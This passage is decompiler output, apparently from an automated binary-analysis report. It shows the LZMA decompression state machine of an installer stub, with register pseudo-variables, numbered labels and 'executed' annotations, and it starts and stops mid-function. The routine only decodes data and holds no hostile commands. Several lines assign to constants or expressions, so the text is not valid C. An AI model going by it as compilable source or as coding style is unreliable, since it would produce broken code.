                                                  									 *(_t644 - 0x88) = 0x18;
                                                  									L170:
                                                  									_t579 = 0x22;
                                                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                  									_t539 = 0;
                                                  									L172:
                                                  									return _t539;
                                                  								}
                                                  								L147:
                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  								_t484 = _t644 - 0x70;
                                                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                  								goto L148;
                                                  							}
                                                  							L155:
                                                  							_t537 =  *(_t644 - 0x7c);
                                                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                  							while(1) {
                                                  								L140:
                                                  								 *(_t644 - 0x88) = _t537;
                                                  								while(1) {
                                                  									L1:
                                                  									_t538 =  *(_t644 - 0x88);
                                                  									if(_t538 > 0x1c) {
                                                  										break;
                                                  									}
                                                  									L2:
                                                  									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
                                                  										case 0:
                                                  											L3:
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												goto L170;
                                                  											}
                                                  											L4:
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                  											_t538 =  *( *(_t644 - 0x70));
                                                  											if(_t538 > 0xe1) {
                                                  												goto L171;
                                                  											}
                                                  											L5:
                                                  											_t542 = _t538 & 0x000000ff;
                                                  											_push(0x2d);
                                                  											asm("cdq");
                                                  											_pop(_t581);
                                                  											_push(9);
                                                  											_pop(_t582);
                                                  											_t638 = _t542 / _t581;
                                                  											_t544 = _t542 % _t581 & 0x000000ff;
                                                  											asm("cdq");
                                                  											_t633 = _t544 % _t582 & 0x000000ff;
                                                  											 *(_t644 - 0x3c) = _t633;
                                                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                  												L10:
                                                  												if(_t641 == 0) {
                                                  													L12:
                                                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                  													goto L15;
                                                  												} else {
                                                  													goto L11;
                                                  												}
                                                  												do {
                                                  													L11:
                                                  													_t641 = _t641 - 1;
                                                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                  												} while (_t641 != 0);
                                                  												goto L12;
                                                  											}
                                                  											L6:
                                                  											if( *(_t644 - 4) != 0) {
                                                  												GlobalFree( *(_t644 - 4));
                                                  											}
                                                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                  											 *(_t644 - 4) = _t538;
                                                  											if(_t538 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                  												goto L10;
                                                  											}
                                                  										case 1:
                                                  											L13:
                                                  											__eflags =  *(_t644 - 0x6c);
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												L157:
                                                  												 *(_t644 - 0x88) = 1;
                                                  												goto L170;
                                                  											}
                                                  											L14:
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                  											_t45 = _t644 - 0x48;
                                                  											 *_t45 =  *(_t644 - 0x48) + 1;
                                                  											__eflags =  *_t45;
                                                  											L15:
                                                  											if( *(_t644 - 0x48) < 4) {
                                                  												goto L13;
                                                  											}
                                                  											L16:
                                                  											_t550 =  *(_t644 - 0x40);
                                                  											if(_t550 ==  *(_t644 - 0x74)) {
                                                  												L20:
                                                  												 *(_t644 - 0x48) = 5;
                                                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                  												goto L23;
                                                  											}
                                                  											L17:
                                                  											 *(_t644 - 0x74) = _t550;
                                                  											if( *(_t644 - 8) != 0) {
                                                  												GlobalFree( *(_t644 - 8));
                                                  											}
                                                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                  											 *(_t644 - 8) = _t538;
                                                  											if(_t538 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												goto L20;
                                                  											}
                                                  										case 2:
                                                  											L24:
                                                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                  											 *(_t644 - 0x84) = 6;
                                                  											 *(_t644 - 0x4c) = _t557;
                                                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                  											goto L132;
                                                  										case 3:
                                                  											L21:
                                                  											__eflags =  *(_t644 - 0x6c);
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												L158:
                                                  												 *(_t644 - 0x88) = 3;
                                                  												goto L170;
                                                  											}
                                                  											L22:
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											_t67 = _t644 - 0x70;
                                                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                  											__eflags =  *_t67;
                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                  											L23:
                                                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                  											if( *(_t644 - 0x48) != 0) {
                                                  												goto L21;
                                                  											}
                                                  											goto L24;
                                                  										case 4:
                                                  											L133:
                                                  											_t559 =  *_t642;
                                                  											_t626 = _t559 & 0x0000ffff;
                                                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                  											if( *(_t644 - 0xc) >= _t596) {
                                                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                  												 *(_t644 - 0x40) = 1;
                                                  												_t560 = _t559 - (_t559 >> 5);
                                                  												__eflags = _t560;
                                                  												 *_t642 = _t560;
                                                  											} else {
                                                  												 *(_t644 - 0x10) = _t596;
                                                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                  											}
                                                  											if( *(_t644 - 0x10) >= 0x1000000) {
                                                  												goto L139;
                                                  											} else {
                                                  												goto L137;
                                                  											}
                                                  										case 5:
                                                  											L137:
                                                  											if( *(_t644 - 0x6c) == 0) {
                                                  												L168:
                                                  												 *(_t644 - 0x88) = 5;
                                                  												goto L170;
                                                  											}
                                                  											L138:
                                                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                  											L139:
                                                  											_t537 =  *(_t644 - 0x84);
                                                  											L140:
                                                  											 *(_t644 - 0x88) = _t537;
                                                  											goto L1;
                                                  										case 6:
                                                  											L25:
                                                  											__edx = 0;
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												L36:
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) = 1;
                                                  												 *(__ebp - 0x84) = 7;
                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											L26:
                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  											__esi =  *(__ebp - 0x60);
                                                  											__cl = 8;
                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  											__ecx =  *(__ebp - 0x3c);
                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  											__ecx =  *(__ebp - 4);
                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											if( *(__ebp - 0x38) >= 4) {
                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                  													_t98 = __ebp - 0x38;
                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                  													__eflags =  *_t98;
                                                  												} else {
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  												}
                                                  											} else {
                                                  												 *(__ebp - 0x38) = 0;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                  											if( *(__ebp - 0x34) == __edx) {
                                                  												L35:
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												goto L61;
                                                  											} else {
                                                  												L32:
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__ecx =  *(__ebp - 8);
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  												goto L41;
                                                  											}
                                                  										case 7:
                                                  											L66:
                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                  											if( *(__ebp - 0x40) != 1) {
                                                  												L68:
                                                  												__eax =  *(__ebp - 0x24);
                                                  												 *(__ebp - 0x80) = 0x16;
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  												__eax =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                  												__eflags = __eax;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L69;
                                                  											}
                                                  											L67:
                                                  											__eax =  *(__ebp - 4);
                                                  											__ecx =  *(__ebp - 0x38);
                                                  											 *(__ebp - 0x84) = 8;
                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  											goto L132;
                                                  										case 8:
                                                  											L70:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xa;
                                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x38);
                                                  												__ecx =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                                  												 *(__ebp - 0x84) = 9;
                                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  											}
                                                  											goto L132;
                                                  										case 9:
                                                  											L73:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												goto L90;
                                                  											}
                                                  											L74:
                                                  											__eflags =  *(__ebp - 0x60);
                                                  											if( *(__ebp - 0x60) == 0) {
                                                  												goto L171;
                                                  											}
                                                  											L75:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                  											__eflags = _t259;
                                                  											0 | _t259 = _t259 + _t259 + 9;
                                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                  											goto L76;
                                                  										case 0xa:
                                                  											L82:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												L84:
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xb;
                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  												goto L132;
                                                  											}
                                                  											L83:
                                                  											__eax =  *(__ebp - 0x28);
                                                  											goto L89;
                                                  										case 0xb:
                                                  											L85:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__ecx =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x20);
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x24);
                                                  											}
                                                  											__ecx =  *(__ebp - 0x28);
                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  											L89:
                                                  											__ecx =  *(__ebp - 0x2c);
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  											L90:
                                                  											__eax =  *(__ebp - 4);
                                                  											 *(__ebp - 0x80) = 0x15;
                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  											goto L69;
                                                  										case 0xc:
                                                  											L99:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												L164:
                                                  												 *(__ebp - 0x88) = 0xc;
                                                  												goto L170;
                                                  											}
                                                  											L100:
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t334 = __ebp - 0x70;
                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t334;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											goto L101;
                                                  										case 0xd:
                                                  											L37:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												L159:
                                                  												 *(__ebp - 0x88) = 0xd;
                                                  												goto L170;
                                                  											}
                                                  											L38:
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t122 = __ebp - 0x70;
                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t122;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L39:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  												goto L48;
                                                  											}
                                                  											L40:
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												goto L54;
                                                  											}
                                                  											L41:
                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  											 *(__ebp - 0x48) = __eax;
                                                  											__eax = __eax + 1;
                                                  											__eax = __eax << 8;
                                                  											__eax = __eax + __ebx;
                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edx = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												 *(__ebp - 0x40) = 1;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												__ebx = __ebx + __ebx + 1;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edx;
                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L39;
                                                  											} else {
                                                  												L45:
                                                  												goto L37;
                                                  											}
                                                  										case 0xe:
                                                  											L46:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												L160:
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											L47:
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t156 = __ebp - 0x70;
                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t156;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											while(1) {
                                                  												L48:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													break;
                                                  												}
                                                  												L49:
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t170 = __edx + 1; // 0x1
                                                  													__ebx = _t170;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													continue;
                                                  												} else {
                                                  													L53:
                                                  													goto L46;
                                                  												}
                                                  											}
                                                  											L54:
                                                  											_t173 = __ebp - 0x34;
                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  											__eflags =  *_t173;
                                                  											goto L55;
                                                  										case 0xf:
                                                  											L58:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												L161:
                                                  												 *(__ebp - 0x88) = 0xf;
                                                  												goto L170;
                                                  											}
                                                  											L59:
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t203 = __ebp - 0x70;
                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t203;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L60:
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												L55:
                                                  												__al =  *(__ebp - 0x44);
                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  												goto L56;
                                                  											}
                                                  											L61:
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__edx = __ebx + __ebx;
                                                  											__ecx =  *(__ebp - 0x10);
                                                  											__esi = __edx + __eax;
                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												_t217 = __edx + 1; // 0x1
                                                  												__ebx = _t217;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L60;
                                                  											} else {
                                                  												L65:
                                                  												goto L58;
                                                  											}
                                                  										case 0x10:
                                                  											L109:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												L165:
                                                  												 *(__ebp - 0x88) = 0x10;
                                                  												goto L170;
                                                  											}
                                                  											L110:
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t365 = __ebp - 0x70;
                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t365;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											goto L111;
                                                  										case 0x11:
                                                  											L69:
                                                  											__esi =  *(__ebp - 0x58);
                                                  											 *(__ebp - 0x84) = 0x12;
                                                  											goto L132;
                                                  										case 0x12:
                                                  											L128:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												L131:
                                                  												__eax =  *(__ebp - 0x58);
                                                  												 *(__ebp - 0x84) = 0x13;
                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                  												L132:
                                                  												 *(_t644 - 0x54) = _t642;
                                                  												goto L133;
                                                  											}
                                                  											L129:
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											__eflags = __eax;
                                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  											goto L130;
                                                  										case 0x13:
                                                  											L141:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												L143:
                                                  												_t469 = __ebp - 0x58;
                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  												__eflags =  *_t469;
                                                  												 *(__ebp - 0x30) = 0x10;
                                                  												 *(__ebp - 0x40) = 8;
                                                  												L144:
                                                  												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                  												L145:
                                                  												 *(_t644 - 0x50) = 1;
                                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                  												goto L149;
                                                  											}
                                                  											L142:
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											 *(__ebp - 0x30) = 8;
                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  											L130:
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											 *(__ebp - 0x40) = 3;
                                                  											goto L144;
                                                  										case 0x14:
                                                  											L156:
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  											__eax =  *(__ebp - 0x80);
                                                  											while(1) {
                                                  												L140:
                                                  												 *(_t644 - 0x88) = _t537;
                                                  												goto L1;
                                                  											}
                                                  										case 0x15:
                                                  											L91:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  											__al = __al & 0x000000fd;
                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  											goto L120;
                                                  										case 0x16:
                                                  											goto L0;
                                                  										case 0x17:
                                                  											while(1) {
                                                  												L145:
                                                  												 *(_t644 - 0x50) = 1;
                                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                  												goto L149;
                                                  											}
                                                  										case 0x18:
                                                  											goto L146;
                                                  										case 0x19:
                                                  											L94:
                                                  											__eflags = __ebx - 4;
                                                  											if(__ebx < 4) {
